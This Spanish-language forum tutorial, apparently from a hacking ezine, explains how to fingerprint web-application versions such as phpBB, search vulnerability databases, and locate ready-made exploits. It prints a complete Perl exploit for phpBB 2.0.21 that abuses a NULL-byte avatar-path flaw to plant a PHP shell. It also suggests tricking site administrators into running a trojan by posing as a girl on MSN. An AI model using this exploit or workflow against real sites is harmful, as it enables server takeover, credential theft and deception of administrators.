Como Ya se dieron cuenta ya esta la Ezine H-NeZ #1 , Que abarcara distintos temas.
Para poder Dar a Conocer mejor la Informacion, selecionare cada info de la ezine y la posteare por separado, Para que todos pueden ver los Manuales de una forma mas directa, (Solo Bajarse la seccion que le interesa) o Bajarse la Ezine Completa.
Compilar Exploit en C
Compilar Exploit En Php
Interpretar Exploit en Perl
Interpretar Exploit en Python.Para ver este enlace Registrate o Inicia Sesion Descargar AQUI
Para ver este enlace Registrate o Inicia Sesion Mirror Descarga
Para ver este enlace Registrate o Inicia Sesion Posteado OriginalMente en New Bytes
- En este Tutorial Explicare la forma mas facil de encontrar informacion sobre las vulnerabilidad
es de las distintas aplicaciones que se encuentran en una pagina web, no intenta de ser una guia paso a paso, pero si un buen referente para que luego exploten sus propios metodos de investigacion, y principalmente leer , para evitar preguntas sin sentidos.
Oz ¡ Ahy varias formas de auditar una pagina web, si no es via "host" escaneando sus puertos y examinando que Servicios Tienen corriendo, (ftp, http, etc):
nmap -v -sSV -P0
Tambien se puede hacer una "escanear" manual, buscando los Scripts que ocupan, foros, blogs, sistemas de noticias, etc..
[alerta] Un aspecto esencial es ver de que version es. Este Ejemplo es en los foros PHPBB
http://<server>/[path]/docs/CHANGELOG.html
Le agregamos una Version mas, por ejemplo si Sale 2.0.20 , es 2.0.21, porque ahy explica los cambios que se s creado en la version anterior 2.0.20 pero en esta "version" 2.0.21 todavia no lo corrigen, o mejor dicho el administrador no actualiza el script
En una forma bastante eficaz, porque muchos de estos scripts son bastante vulnerables , RFI, SQL, XSS entre otros.
La ventaja es que estas vulnerabilidad
es se pueden explotar directamente desde el navegador, pero siempre existen programas que facilitan este procedimiento, creando script en perl, php, etc, para solo introducir los datos y este aprovecha la vulnerabilidad
.
Antes de avanzar quiero aclarar algo: Vulnerabilidad = Fallo en el sistema, para que cualquier usuarios mal "intencionado" pueda ejecutar codigos arbitrarios en el sistema victima
Exploit = Codigo
(compilado, interpretado),o
Accion que aprovecha una vulnerabilidad, para tener privilegios en el sistema.
¿A que me refiero con Accion? Que no necesariamente tiene que ser un Exploit escrito en Perl que se tenga que interpretar , si no tambien una simple inyeccion sql , rfi, xss, es un exploit. Codigos directamente incrustados desde el navegador, muchos users creen que el "Exploit" tiene que ser un programa que se tiene que compilar o interpretar, pero esto no es asi. Puede ser cualquier codigo, o incluso puede ser hasta ing social
Hacerce pasar por chica en msn y enviarle un troyano al administrador para averiguar la password de su sitio sigue siendo parte de un Exploit. Pero no es ni un Codigo ni Nada
"Human Exploit"No e Escuchado a nadie Hacer termino a "Human Exploit" como parte de un tipo de Exploit mas, pero intento que si se haga XD¡. para hacer referencia a la Ing social como parte de un Exploit (que aprovecha una vulnerabilidad) Una ves Vista la Version del Script, En este caso el Foro PHPBB, Talves nos surgan las siguientes dudas:
¿Que tenemos que Hacer Ahora? R: Ir algun Bugtrag y Buscar si Existen alguna Vulnerabilidad
¿Donde la Encuentro? ¿Estara Listo? Si existe alguna vulnerabilidad, existira alguna explicacion, pero no necesariamente existira algun tipo de exploit
¿Tendre que Leer? Si no te gusta leer no sigas leyendo
Buscando en la Enciclopedia de las Vulnerabilidad: Ingresamos a
Para ver este enlace Registrate o Inicia Sesionwww.Securityfo cus.com
Ingresamos a
Vulnerabilitie s
En
Vendor Selecionamos el Nombre del Script, en este caso PHPBB
y Buscamos su
Version
[nota] Algunas Veces nos nos encontraremos con Ninguna Vulnerabilidad .
Una vez Encontrada la Version, Podremos visualizar las Vulnerabilidad
es, ahora devemos ingresar a los Link expuestos para poder averiguar
¿Que tipo de Vulnerabilidad Tiene? y asi Poder seguir buscando.
Para Cada vulnerabilidad tenemos que leer su descripcion, ahora el ingles no es una dificultar ¿puedes leer? ¿Sabes Ocupar Google? .
El Script PHPBB esta suseptible a la ejecucion de codigos php arbitrarios, los atacantes puedes tener privilegios sobre el servidor en donde se aloja la pagina web
Ingresamos a la Pestaña Exploit:
Los atacantes puedes Explotar esta vulnerabilidad por el navegador
Ahora ya tenemos mas informacion sobre las vulnerabilidad, es importante leer cada una de ellas, para asi tener una mayor posibilidad para poder encontrar algun Exploit.
En lo Personal Si quiero Buscar algun Exploit Parto Obviamente por el titulo:
Google
"phpBB Avatar_Path PHP Code Execution Vulnerability"exploit
Claramento
aunque no en todos los casos , nos devolvera los link de securityfocus al inicio, pero ahy otras webs de seguridad , en donde dan como noticia la misma vulnerabilidad, en algunos casos estos sitios exponen links directos hacia los exploits, o como tambien en muchos casos que no.
Pero tambien si analizamos un poco mas, podriamos buscar por el autor , quien descubrio la Vulnerabilidad, mas otras palabras claves:
Como ven nos Tira un Link hacia Milw0rm donde claramente ahy un Exploit.
[nota]
Para ver este enlace Registrate o Inicia Sesion#!/usr/bin/perl -w
# Author: ShAnKaR
# Title: multiple PHP application poison NULL byte vulnerability
# Applications: phpBB 2.0.21, punBB 1.2.12
# Threat Level: Critical
# Original advisory (in Russian): http://www.security.nnov.ru/Odocument221.html
#
# Poison NULL byte vulnerability for perl CGI applications was described
# in [1]. ShAnKaR noted, that same vulnerability also affects different
# PHP applications. An example of vulnerable applications are phpBB and
# punBB.
#
# Vulnerability can be used to upload or replace arbitrary files on
# server, e.g. PHP scripts, by adding "poison NULL" (%00) to filename.
#
# In case of phpBB and punBB vulnerability can be exploited by changing
# location of avatar file and uploading avatar file with PHP code in EXIF
# data.
#
# A PoC exploit to change Avatar file location for phpBB:
#
#
use HTTP::Cookies;
use LWP;
use URI::Escape;
unless(@ARGV){die "USE:\n./phpbb.pl localhost.com/forum/ admin pass images/avatars/shell.php [d(DEBUG)]\n"}
my $ua = LWP::UserAgent->new(agent=>'Mozilla/4.0 (compatible; Windows 5.1)');
$ua->cookie_jar( HTTP::Cookies->new());
$url='http://'.$ARGV[0].'/login.php';
$data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1";
my $req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
my $res = $ua->request($req);
$res=$ua->get('http://'.$ARGV[0].'/login.php');
$content=$res->content;
$content=~ m/true&sid=([^"]+)"/g;
if($ARGV[4]){
$content=$res->content;
print $content;
}
$url='http://'.$ARGV[0].'/login.php';
$data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1&admin=1";
$req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$res = $ua->request($req);
$url='http://'.$ARGV[0].'/admin/admin_board.php?sid='.$1;
$data="submit=submit&allow_avatar_local=1&avatar_path=".$ARGV[3]."%00";
$req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$res = $ua->request($req);
if($ARGV[4]){
$content=$res->content;
print $content;
}
# milw0rm.com [2006-09-11]
Eso era con 1 sola Vulnerabilidad, ahora expondre los Link de las otras vulnerabilidad que encontro Securityfocus en su Base de datos:
phpBB Privmsg.PHP HTML Injection Vulnerability
Nivisec Admin Topic Action Logging Module Remote File Include Vulnerability
Securitfocus nos ayuda bastante para empezar , a buscar las vulnerabilidad
es, asi podremos ir cada vez avanzado, pero ya teniendo una Guia.
Para Entender ahy que leer sobre los distintos tipos de Vulnerabilidad, no sacamos nada, con encontrar el exploit, si no sabemos que es lo que hace, es por ello que es necesario leer sobre las "nociones basicas" de las distintas vulnerabilidad es, y asi tambien algun lenguaje de programacion, si no hacen esto, existiran preguntas talves como:
¿Que hago Ahora?
Lo Compilo y no Sale nada¡
¿Que es Exploit?
Ahy una buena base de informacion en el Foro de Vulnerabildiad es de
Para ver este enlace Registrate o Inicia Sesion new-bytes.net
LEEER¡ NO EVITAR LA FLOJERA MENTAL ¡¡¡ AHY QUE LEER¡' PARA SABER¡¡¡ Creo que es una Duda bastante recurrente y bueno , es bueno resolver una duda mas aunque sea pequeña .
Oz
Para ver este enlace Registrate o Inicia Sesionwww.new-Bytes.net
Si van a Copiar Exponer de donde lo sacaron, y quien es el autor.
Para ver este enlace Registrate o Inicia Sesion Posteado OriginalMente en New Bytes
Autor